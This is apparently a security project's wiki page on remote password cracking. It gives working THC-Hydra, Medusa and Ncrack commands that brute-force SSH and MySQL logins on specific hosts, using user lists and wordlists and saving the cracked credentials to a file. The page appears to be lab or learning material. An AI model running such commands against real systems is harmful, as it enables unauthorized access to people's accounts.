Wiki
Clone wikipig / PasswordCracking
Password Cracking
Password cracking is one of the most basic types of attacks. Password cracking is (very broadly) divided into two categories. The first is hash cracking, where a hashed version of a password is obtained through network monitoring, retrieving an encrypted password file, etc., and a tool is then used to break the hash. Common tools for this depend on the situation, but include: Aircrack, for WEP/WPA passwords; John the Ripper, for Unix passwords; and Cain and Abel, for Windows passwords. The second, and the type this project is concerned with, is brute-force remote authentication attacks.
TOOLS USED
THC-Hydra
Example Attack
# Attempting to crack John Doe (jdoe) on ssh with Roget's wordlist hydra -ljdoe -P passwd_lists/Roget.words 137.22.73.129 ssh # Try cracking on all the .73 hosts we have running, checking extra stuff # for passwords, showing all combos, and writing success to file hydra -L carletonusers.txt -P passwd_lists/Unabr.dict -M hosts.txt -e ns -v -o valid_credentials.txt
Medusa
Example Attack
# Attempting to crack jdoe on ssh with Roget's wordlist medusa -ujdoe -P passwd_lists/Roget.words -h137.22.73.131 -Mssh # Attempting to crack me on mysql with englex-dict, using ssl medusa -ugriffisd -P passwd_lists/englex-dict -h137.22.73.131 -s -Mmysql
Ncrack
Example Attack
# Run on SSH with input username and password list, prioritizing to # username:allpasswords, not allusernames:password ncrack -U carletonusers.txt -P passwd_lists/Unabr.dict --passwords-first 137.22.73.130 -p22 # Run, very carefully, using built-in lists on SSH ncrack -T paranoid 137.22.73.132 -p22 # Hammer the ever-loving shit out of one pre-determined user ncrack --user christjo -T insane 137.22.73.132 -p22
ATTACK PROFILE
????
Updated